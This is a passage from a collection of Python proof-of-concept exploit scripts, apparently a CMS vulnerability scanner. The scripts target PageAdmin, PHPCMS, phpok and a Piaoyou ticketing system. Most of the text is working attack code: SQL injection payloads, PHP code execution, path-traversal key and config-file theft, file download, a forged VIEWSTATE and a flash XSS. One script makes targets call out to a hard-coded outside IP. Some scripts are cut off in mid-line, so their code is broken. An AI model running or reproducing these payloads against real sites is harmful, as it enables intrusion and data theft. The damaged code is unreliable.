35 |
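if __name__ == "__main__":
    # Presumably silences the InsecureRequestWarning that verify=False triggers in run().
    warnings.filterwarnings("ignore")
    # A missing target used to surface as an IndexError traceback; print a usage line instead.
    if len(sys.argv) < 2:
        sys.exit("usage: %s <target_base_url>" % sys.argv[0])
    testVuln = metinfo_login_check_sqli_BaseVerify(sys.argv[1])
    testVuln.run()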
--------------------------------------------------------------------------------
/pocs/pageadmin/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/pageadmin/__init__.py
--------------------------------------------------------------------------------
/pocs/pageadmin/pageadmin_forge_viewstate.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: PageAdmin可“伪造”VIEWSTATE执行任意SQL查询&重置管理员密码
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-061699
6 | author: Lucifer
7 | description: 利用.NET的bug可以伪造viewstate登录到SQL执行页面,添加任意账户并重置管理员密码。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
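class pageadmin_forge_viewstate_BaseVerify:
    """Checks whether PageAdmin's install page accepts a forged __VIEWSTATE and exposes its SQL form.

    The target is reported when the page answers 200 and the body contains both
    the WebForms postback helper and the ``Tb_sql`` control.
    """

    def __init__(self, url):
        # Target base URL; the probe path is appended to it unchanged.
        self.url = url

    def run(self):
        """Send the probe and print a coloured verdict; returns nothing."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/e/install/index.aspx?__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTExODcwMDU5OTgPZBYCAgEPZBYCAgMPFgIeB1Zpc2libGVoZGQ%3D&ctl02=%E8%BF%90%E8%A1%8CSQL"
        vulnurl = self.url + payload
        try:
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # Both markers are required to reduce false positives from generic ASP.NET pages.
            if req.status_code == 200 and r"WebForm_DoPostBackWithOptions" in req.text and r"Tb_sql" in req.text:
                cprint("[+]存在PageAdmin可“伪造”VIEWSTATE执行任意SQL查询&重置管理员密码漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在pageadmin_forge_viewstate漏洞", "white", "on_grey")
        # `except Exception` instead of a bare except so Ctrl-C / SystemExit still propagate.
        except Exception:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")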
33 |
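if __name__ == "__main__":
    # Presumably silences the InsecureRequestWarning that verify=False triggers in run().
    warnings.filterwarnings("ignore")
    # A missing target used to surface as an IndexError traceback; print a usage line instead.
    if len(sys.argv) < 2:
        sys.exit("usage: %s <target_base_url>" % sys.argv[0])
    testVuln = pageadmin_forge_viewstate_BaseVerify(sys.argv[1])
    testVuln.run()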
--------------------------------------------------------------------------------
/pocs/phpcms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/phpcms/__init__.py
--------------------------------------------------------------------------------
/pocs/phpcms/phpcms_authkey_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpcms authkey泄露
5 | referer: http://wooyun.org/bugs/wooyun-2015-0105242
6 | author: Lucifer
7 | description: PHPCMS authkey 泄露漏洞,可引起SQL注入。
8 | '''
9 | import re
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
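class phpcms_authkey_disclosure_BaseVerify:
    """authkey disclosure check for PHPCMS api.php (``cachefile`` traversal into the phpsso cache).

    The response is scanned for a 32-character word token, which is printed as
    the leaked key when the request succeeded.
    """

    def __init__(self, url):
        # Target base URL; the probe path is appended to it unchanged.
        self.url = url

    def run(self):
        """Send the probe and print a coloured verdict; returns nothing."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # Raw string: the original non-raw literal relied on invalid escapes (\. \p \c) being
        # kept verbatim, which is a SyntaxWarning in recent Pythons. The runtime value is
        # unchanged — the original's "\\applist" also produced a single backslash.
        payload = r"/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin"
        vulnurl = self.url + payload
        try:
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # NOTE(review): any run of 32 word characters matches (\w is Unicode-aware on
            # Python 3), so a page containing an unrelated 32-char token is a false positive;
            # a pattern specific to the authkey format would be stricter.
            m = re.search(r'(\w{32})',req.text)
            if req.status_code == 200 and m:
                cprint("[+]存在PHPCMS authkey泄露漏洞...(高危)\tpayload: "+vulnurl+"\tauthkey: "+m.group(1), "red")
            else:
                cprint("[-]不存在phpcms_authkey_disclosure漏洞", "white", "on_grey")
        # `except Exception` instead of a bare except so Ctrl-C / SystemExit still propagate.
        except Exception:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")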
35 |
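if __name__ == "__main__":
    # Presumably silences the InsecureRequestWarning that verify=False triggers in run().
    warnings.filterwarnings("ignore")
    # A missing target used to surface as an IndexError traceback; print a usage line instead.
    if len(sys.argv) < 2:
        sys.exit("usage: %s <target_base_url>" % sys.argv[0])
    testVuln = phpcms_authkey_disclosure_BaseVerify(sys.argv[1])
    testVuln.run()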
--------------------------------------------------------------------------------
/pocs/phpcms/phpcms_digg_add_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpcms digg_add.php SQL注入
5 | referer: http://www.shangxueba.com/jingyan/2195152.html
6 | author: Lucifer
7 | description: 文件digg_add.php中,参数digg_mod存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
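class phpcms_digg_add_sqli_BaseVerify:
    """Error-based SQL injection check for PHPCMS digg/digg_add.php (``digg_mod``).

    The probe uses a duplicate-key (floor/rand) error that embeds ``md5(1234)``
    and looks for that digest in the response body.
    """

    def __init__(self, url):
        # Target base URL; the probe path is appended to it unchanged.
        self.url = url

    def run(self):
        """Send the probe and print a coloured verdict; returns nothing."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/digg/digg_add.php?id=1&con=2&digg_mod=digg_data%20WHERE%201=2%20+and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,md5(1234),0x7e)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23"
        vulnurl = self.url + payload
        try:
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # 81dc9bdb... is md5("1234"): it only appears if the injected SELECT was evaluated.
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在PHPCMS digg_add.php SQL注入漏洞...(高危)\t\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在phpcms_digg_add_sqli漏洞", "white", "on_grey")
        # `except Exception` instead of a bare except so Ctrl-C / SystemExit still propagate.
        except Exception:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")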
33 |
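if __name__ == "__main__":
    # Presumably silences the InsecureRequestWarning that verify=False triggers in run().
    warnings.filterwarnings("ignore")
    # A missing target used to surface as an IndexError traceback; print a usage line instead.
    if len(sys.argv) < 2:
        sys.exit("usage: %s <target_base_url>" % sys.argv[0])
    testVuln = phpcms_digg_add_sqli_BaseVerify(sys.argv[1])
    testVuln.run()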
38 |
--------------------------------------------------------------------------------
/pocs/phpcms/phpcms_flash_upload_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpcms2008 flash_upload.php SQL注入
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件flash_upload.php中,参数modelid存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
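class phpcms_flash_upload_sqli_BaseVerify:
    """Error-based SQL injection check for PHPCMS 2008 flash_upload.php (``modelid``).

    The payload is fully percent-encoded; the expected marker is the md5 digest
    of the value it embeds (``md5(3.1415)`` once decoded).
    """

    def __init__(self, url):
        # Target base URL; the probe path is appended to it unchanged.
        self.url = url

    def run(self):
        """Send the probe and print a coloured verdict; returns nothing."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/flash_upload.php?modelid=%30%20%61%6E%64%28%73%65%6C%65%63%74%20%31%20%66%72%6F%6D%28%73%65%6C%65%63%74%20%63%6F%75%6E%74%28%2A%29%2C%63%6F%6E%63%61%74%28%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20%63%6F%6E%63%61%74%28%30%78%37%65%2C%6D%64%35%28%33%2E%31%34%31%35%29%2C%30%78%37%65%29%29%29%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%20%6C%69%6D%69%74%20%30%2C%31%29%2C%66%6C%6F%6F%72%28%72%61%6E%64%28%30%29%2A%32%29%29%78%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%20%67%72%6F%75%70%20%62%79%20%78%29%61%29"
        vulnurl = self.url + payload
        try:
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # The digest only appears if the injected expression was evaluated server-side.
            if r"63e1f04640e83605c1d177544a5a0488" in req.text:
                cprint("[+]存在phpcms2008 flash_upload.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在phpcms_flash_upload_sqli漏洞", "white", "on_grey")
        # `except Exception` instead of a bare except so Ctrl-C / SystemExit still propagate.
        except Exception:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")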
33 |
if __name__ == "__main__":
    # Suppress the InsecureRequestWarning emitted because the probe uses verify=False.
    warnings.filterwarnings("ignore")
    phpcms_flash_upload_sqli_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/phpcms/phpcms_product_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpcms2008 product.php 代码执行
5 | referer: http://www.wooyun.org/bugs/WooYun-2011-02984
6 | author: Lucifer
7 | description: 文件product.php中,参数pagesize存在代码注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
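class phpcms_product_code_exec_BaseVerify:
    """Probe a phpcms2008 site for code execution via the product.php ``pagesize`` parameter.

    One GET is sent with the reference payload; a vulnerable host is assumed
    when the response contains a phpinfo() page fragment.
    """

    def __init__(self, url):
        """Remember the target base URL; payloads start with ``/`` so it is
        expected without a trailing slash."""
        self.url = url

    def run(self):
        """Send the probe and print a colored verdict to stdout.

        Returns nothing. Any failure while requesting or reading the response
        is reported as "possibly not vulnerable" instead of being raised.
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/yp/product.php?pagesize=${@phpinfo()}"
        vulnurl = self.url + payload
        try:
            # verify=False: TLS certificate validation is off so self-signed
            # targets can be scanned.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # This string only appears in phpinfo() output, so its presence
            # means the injected expression was evaluated server-side.
            if r"Configuration File (php.ini) Path" in req.text:
                cprint("[+]存在phpcms2008 product.php 代码执行漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在phpcms_product_code_exec漏洞", "white", "on_grey")
        except Exception:
            # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
            # are no longer swallowed by the best-effort reporting.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")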
33 |
if __name__ == "__main__":
    warnings.filterwarnings("ignore")  # hide InsecureRequestWarning from verify=False
    checker = phpcms_product_code_exec_BaseVerify(sys.argv[1])
    checker.run()
--------------------------------------------------------------------------------
/pocs/phpcms/phpcms_v961_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpcms 9.6.1任意文件读取漏洞
5 | referer: http://bobao.360.cn/learning/detail/3805.html
6 | author: Lucifer
7 | description: phpcms最新版本任意文件读取,漏洞原理见来源页面。
8 | '''
9 | import re
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class phpcms_v961_fileread_BaseVerify:
def __init__(self, url):
    """Remember the target base URL for the probe in ``run``.

    The probe paths start with ``/``, so *url* is expected without a
    trailing slash.
    """
    self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "Content-Type":"application/x-www-form-urlencoded",
22 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
23 | }
24 | url_preffix = self.url + "/index.php?m=wap&c=index&a=init&siteid=1"
25 | siteid = ""
26 | att_json = ""
27 | try:
28 | req1 = requests.get(url_preffix, headers=headers, timeout=10, verify=False)
29 | for cookie in req1.cookies:
30 | siteid = cookie.value
31 | payload = "/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&filename=test.jpg&src=%26i%3D3%26d%3D1%26t%3D9999999999%26catid%3D1%26ip%3D8.8.8.8%26m%3D3%26modelid%3D3%26s%3Dcaches%2fconfigs%2fsystem.p%26f%3Dh%25253Cp%26xxxx%3D"
32 | vulnurl = self.url + payload
33 | post_data = {
34 | "userid_flash":siteid
35 | }
36 | req2 = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
37 | for cookie in req2.cookies:
38 | att_json = cookie.value
39 | req3 = requests.get(self.url+"/index.php?m=content&c=down&a=init&a_k="+att_json, headers=headers, timeout=10, verify=False)
40 | pattern = '.*?'
41 | link = re.search(pattern, req3.text).group(1)
42 | req4 = requests.get(self.url+"/index.php"+link, headers=headers, verify=False)
43 | if r"可能不存在漏洞", "cyan")
50 |
if __name__ == "__main__":
    # The probe uses verify=False; keep urllib3's InsecureRequestWarning quiet.
    warnings.filterwarnings("ignore")
    target = sys.argv[1]
    phpcms_v961_fileread_BaseVerify(target).run()
55 |
--------------------------------------------------------------------------------
/pocs/phpcms/phpcms_v96_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpcms v9.6.0 SQL注入
5 | referer: https://zhuanlan.zhihu.com/p/26263513
6 | author: Lucifer
7 | description: 过滤函数不严谨造成的过滤绕过。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
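class phpcms_v96_sqli_BaseVerify:
    """Probe a phpcms v9.6.0 site for the swfupload_json / down SQL injection.

    Three requests are chained: the first collects a cookie value, the second
    posts it with the reference payload and collects another cookie, and the
    third uses that value as ``a_k`` and inspects the response for an XPath
    error message.
    """

    def __init__(self, url):
        """Remember the target base URL; request paths start with ``/`` so it
        is expected without a trailing slash."""
        self.url = url

    def run(self):
        """Run the three-step probe and print a colored verdict to stdout.

        Returns nothing. Failures in the first two steps are ignored and the
        chain continues with whatever value was collected; a failure in the
        final step is reported as "possibly not vulnerable".
        """
        headers = {
            "Content-Type": "application/x-www-form-urlencoded",
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        url_prefix = self.url + "/index.php?m=wap&c=index&a=init&siteid=1"
        # Starts as an empty dict; if no cookie is ever collected, str() of it
        # ("{}") is what ends up in the final URL.
        tmp_cookie = {}
        try:
            req = requests.get(url_prefix, headers=headers, timeout=10, verify=False)
            # Only the last cookie's value survives the loop.
            for cookie in req.cookies:
                tmp_cookie = cookie.value
        except Exception:
            # Best-effort step; narrowed from bare ``except:`` so Ctrl-C works.
            pass
        post_data = {
            "userid_flash": tmp_cookie
        }
        url_suffix = self.url + "/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28user%28%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26"
        try:
            req2 = requests.post(url_suffix, data=post_data, headers=headers, timeout=10, verify=False)
            for cookie in req2.cookies:
                tmp_cookie = cookie.value
        except Exception:
            pass

        vulnurl = self.url + "/index.php?m=content&c=down&a_k="+str(tmp_cookie)
        try:
            # verify=False: TLS certificate validation is off so self-signed
            # targets can be scanned.
            req3 = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # An XPath error in the page means the injected updatexml() ran.
            if r"XPATH syntax error" in req3.text:
                cprint("[+]存在phpcms v9.6.0 SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在phpcms_v96_sqli漏洞", "white", "on_grey")
        except Exception:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")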
52 |
if __name__ == "__main__":
    # Quiet the InsecureRequestWarning raised by the verify=False requests.
    warnings.filterwarnings("ignore")
    phpcms_v96_sqli_BaseVerify(sys.argv[1]).run()
57 |
--------------------------------------------------------------------------------
/pocs/phpcms/phpcms_v9_flash_xss.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpcms v9 flash xss漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-079938
6 | author: Lucifer
7 | description: 文件player.swf中,存在xss漏洞。
8 | '''
9 | import sys
10 | import urllib.request
11 | import hashlib
12 | import requests
13 | import warnings
14 | from termcolor import cprint
15 |
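class phpcms_v9_flash_xss_BaseVerify:
    """Probe a phpcms v9 site for the known-vulnerable player.swf (flash XSS).

    The verdict is based purely on a fingerprint: the SWF is downloaded and
    its MD5 compared with the hash of the vulnerable build. The query string
    in the payload is the reference PoC and is not interpreted by this script.
    """

    def __init__(self, url):
        """Remember the target base URL; the payload starts with ``/`` so it is
        expected without a trailing slash."""
        self.url = url

    def run(self):
        """Fetch player.swf, hash it and print a colored verdict to stdout.

        Returns nothing. Network or hashing failures are reported as
        "possibly not vulnerable" instead of being raised.
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # MD5 of the vulnerable player.swf build (taken from the reference PoC).
        flash_md5 = "cf00b069e36e756705c49b3a3bf20c40"
        payload = "/statics/js/ckeditor/plugins/flashplayer/player/player.swf?skin=skin.swf&stream=\%22))}catch(e){alert(1)}//"
        vulnurl = self.url + payload
        try:
            # Previously ``headers`` was built but never sent and urlopen had no
            # timeout, so an unresponsive host hung the scan indefinitely.
            # Note: unlike the requests-based PoCs, urllib performs TLS
            # certificate validation here.
            request = urllib.request.Request(vulnurl, headers=headers)
            with urllib.request.urlopen(request, timeout=10) as resp:
                data = resp.read()
            md5_value = hashlib.md5(data).hexdigest()
            # Both sides are 32-hex digests, so equality is the intended test
            # (the original substring check was equivalent but misleading).
            if md5_value == flash_md5:
                cprint("[+]存在phpcms v9 flash xss漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在phpcms_v9_flash_xss漏洞", "white", "on_grey")
        except Exception:
            # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
            # are no longer swallowed.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")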
38 |
if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    checker = phpcms_v9_flash_xss_BaseVerify(sys.argv[1])
    checker.run()
--------------------------------------------------------------------------------
/pocs/phpok/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/phpok/__init__.py
--------------------------------------------------------------------------------
/pocs/phpok/phpok_api_param_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpok api.php SQL注入漏洞
5 | referer: http://www.moonsec.com/post-677.html
6 | author: Lucifer
7 | description: api_control文件存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
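class phpok_api_param_sqli_BaseVerify:
    """Probe a phpok site for the api.php ``param[]`` SQL injection.

    One GET is sent with the reference payload; a vulnerable host is assumed
    when the MD5 of the literal 1234 that the injected SELECT computes shows
    up in the response body.
    """

    def __init__(self, url):
        """Remember the target base URL; the payload starts with ``/`` so it is
        expected without a trailing slash."""
        self.url = url

    def run(self):
        """Send the probe and print a colored verdict to stdout.

        Returns nothing. Any failure while requesting or reading the response
        is reported as "possibly not vulnerable" instead of being raised.
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # NOTE(review): the "¶" characters in this literal look like
        # extraction/encoding damage rather than the author's intent; compare
        # against the upstream file before relying on this probe.
        payload = "/api.php?c=api&f=phpok&id=_total¶m[pid]=42¶m[user_id]=0)UnIOn/**/sElEcT/**/mD5(1234)/**/LIMIT/**/1,1%23"
        vulnurl = self.url + payload
        try:
            # verify=False: TLS certificate validation is off so self-signed
            # targets can be scanned.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在phpok api.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在phpok_api_param_sqli漏洞", "white", "on_grey")
        except Exception:
            # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
            # are no longer swallowed by the best-effort reporting.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")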
33 |
if __name__ == "__main__":
    # verify=False in the probe triggers urllib3's InsecureRequestWarning; mute it.
    warnings.filterwarnings("ignore")
    target = sys.argv[1]
    phpok_api_param_sqli_BaseVerify(target).run()
--------------------------------------------------------------------------------
/pocs/phpok/phpok_remote_image_getshell.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpok remote_image getshell漏洞
5 | referer: http://0day5.com/archives/1820/
6 | author: Lucifer
7 | description: remote_image_f函数没对远程文件后缀做检查直接保存到本地。
8 | '''
9 | import sys
10 | import time
11 | import hashlib
12 | import datetime
13 | import requests
14 | import warnings
15 | from termcolor import cprint
16 |
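class phpok_remote_image_getshell_BaseVerify:
    """Probe a phpok site for the ueditor ``remote_image`` remote-fetch issue.

    This is an out-of-band check: the target is asked to fetch a unique
    marker URL from a hard-coded third-party host (45.76.158.91), and the
    verdict is read back from a log file served by that same host.

    Operational caveats: running this discloses the scan (and the marker)
    to whoever operates that IP, the verdict depends on that host being
    alive and still serving ``web.log``, and there is a fixed 6 s wait.
    """

    def __init__(self, url):
        """Remember the target base URL; the payload starts with ``/`` so it is
        expected without a trailing slash."""
        self.url = url

    def run(self):
        """Trigger the remote fetch, wait, poll the callback log and print a verdict.

        Returns nothing. Failures in either request are reported as
        "possibly not vulnerable" instead of being raised.
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # Per-run marker derived from the current time so each scan can be told
        # apart in the callback log.
        time_stamp = time.mktime(datetime.datetime.now().timetuple())
        m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
        md5_str = m.hexdigest()
        payload = "/index.php?c=ueditor&f=remote_image&upfile=http://45.76.158.91:6868/" + md5_str
        vulnurl = self.url + payload
        try:
            # The response body is not inspected; only the side effect matters.
            requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            eye_url = "http://45.76.158.91/web.log"
            # Give the target time to perform the outbound fetch.
            time.sleep(6)
            reqr = requests.get(eye_url, headers=headers, timeout=10, verify=False)
            if md5_str in reqr.text:
                cprint("[+]存在phpok remote_image getshell漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在phpok_remote_image_getshell漏洞", "white", "on_grey")
        except Exception:
            # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
            # (notably during the 6 s sleep) are no longer swallowed.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")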
42 |
if __name__ == "__main__":
    # Suppress the InsecureRequestWarning emitted because the probe uses verify=False.
    warnings.filterwarnings("ignore")
    phpok_remote_image_getshell_BaseVerify(sys.argv[1]).run()
47 |
--------------------------------------------------------------------------------
/pocs/phpok/phpok_res_action_control_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpok res_action_control.php 任意文件下载(需要cookies文件)
5 | referer: unknown
6 | author: Lucifer
7 | description: 参数file未经过滤进入到下载方法导致任意文件下载。
8 | '''
9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class phpok_res_action_control_filedownload_BaseVerify:
def __init__(self, url):
    """Remember the target base URL for the probe in ``run``.

    The probe path starts with ``/``, so *url* is expected without a
    trailing slash.
    """
    self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | payload = "/admin.php?c=res_action&f=download&file=_config/db.ini.php"
24 | vulnurl = self.url + payload
25 | try:
26 | f = open(r'cookies.txt', 'r')
27 | cookies = {}
28 | for line in f.read().split(";"):
29 | name, value = line.strip().split("=",1)
30 | cookies[name]=value
31 | except:
32 | pass
33 | try:
34 | req = requests.get(vulnurl, headers=headers, cookies=cookies, timeout=10, verify=False)
35 | if r"可能不存在漏洞", "cyan")
42 |
if __name__ == "__main__":
    warnings.filterwarnings("ignore")  # hide InsecureRequestWarning from verify=False
    checker = phpok_res_action_control_filedownload_BaseVerify(sys.argv[1])
    checker.run()
--------------------------------------------------------------------------------
/pocs/piaoyou/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/piaoyou/__init__.py
--------------------------------------------------------------------------------
/pocs/piaoyou/piaoyou_int_order_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 票友票务系统int_order.aspx SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0127911
6 | author: Lucifer
7 | description: 文件tickets/int_order.aspx中,参数id存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
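class piaoyou_int_order_sqli_BaseVerify:
    """Probe a Piaoyou ticketing site for the tickets/int_order.aspx ``id`` SQL injection.

    One GET is sent with the reference payload; the verdict is decided by
    whether the response echoes the "BBB" prefix followed by the database
    version string that the injected conversion error would expose.
    """

    def __init__(self, url):
        """Remember the target base URL; the payload starts with ``/`` so it is
        expected without a trailing slash."""
        self.url = url

    def run(self):
        """Send the probe and print a colored verdict to stdout.

        Returns nothing. Any failure while requesting or reading the response
        is reported as "possibly not vulnerable" instead of being raised.
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/tickets/int_order.aspx?id=1Or/**/1=CoNvErt(InT,ChAr(66)%2BChAr(66)%2BChAr(66)%2b@@VeRsIoN)--"
        vulnurl = self.url + payload
        try:
            # verify=False: TLS certificate validation is off so self-signed
            # targets can be scanned.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if r"BBBMicrosoft" in req.text:
                cprint("[+]存在票友票务系统int_order.aspx SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在piaoyou_int_order_sqli漏洞", "white", "on_grey")
        except Exception:
            # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
            # are no longer swallowed by the best-effort reporting.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")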
33 |
if __name__ == "__main__":
    # The probe uses verify=False; keep urllib3's InsecureRequestWarning quiet.
    warnings.filterwarnings("ignore")
    target = sys.argv[1]
    piaoyou_int_order_sqli_BaseVerify(target).run()
--------------------------------------------------------------------------------
/pocs/piaoyou/piaoyou_multi_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 票友机票预订系统6处SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0118867
6 | author: Lucifer
7 | description: multi sqli。
8 | '''
9 | import sys
